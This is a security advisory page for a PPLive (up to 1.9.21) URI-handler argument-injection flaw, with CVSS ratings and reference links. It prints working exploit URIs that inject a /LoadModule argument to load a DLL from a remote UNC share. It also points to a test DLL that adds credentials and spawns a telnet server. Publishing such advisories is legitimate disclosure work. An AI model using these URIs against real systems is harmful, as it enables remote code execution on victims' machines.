PPLive <= 1.9.21 (/LoadModule) URI Handlers Argument Injection Vuln

2009.03.29
Credit: strawdog
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


Ogólna skala CVSS: 9.3/10
Znaczenie: 10/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

-------------------------------------------------------------------------------- PPLive <= 1.9.21 uri handlers "/LoadModule" remote argument injection by Nine:Situations:Group::strawdog -------------------------------------------------------------------------------- software site:http://www.pplive.com/en/index.html our site: http://retrogod.altervista.org/ software description: "PPLive is a peer-to-peer streaming video network created in Huazhong University of Science and Technology, People's Republic of China. It is part of a new generation of P2P applications, that combine P2P and Internet TV, called P2PTV." vulnerability: The "synacast://", "Play://" ,"pplsv://" and "ppvod://" URI handlers do not verify certain parts of the URI before evaluating command line parameters. This can be exploited against Internet Explorer to e.g. load a dll from a remote UNC path via the "/LoadModule" parameter, example exploit (IE7): synacast://www.microsoft.com/?"%20/LoadModule%20\1.2.3.4\unc_share\sh.dll%20" Play://www.microsoft.com/?"%20/LoadModule%20\\1.2.3.4\unc_share\sh.dll%20" against older versions: pplsv://www.microsoft.com/?"%20/LoadModule%20\\1.2.3.4\unc_share\sh.dll%20" ppvod://www.microsoft.com/?"%20/LoadModule%20\\1.2.3.4\unc_share\sh.dll%20" test dll which adds new credentials / spawns the telnet server: http://retrogod.altervista.org/9sg_pplive_sh.html some interesting readings: http://msdn.microsoft.com/en-us/library/aa767914(VS.85).aspx --------------------------------------------------------------------------------

Referencje:

http://xforce.iss.net/xforce/xfdb/49263
http://www.vupen.com/english/advisories/2009/0739
http://www.milw0rm.com/exploits/8215
http://secunia.com/advisories/34327


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top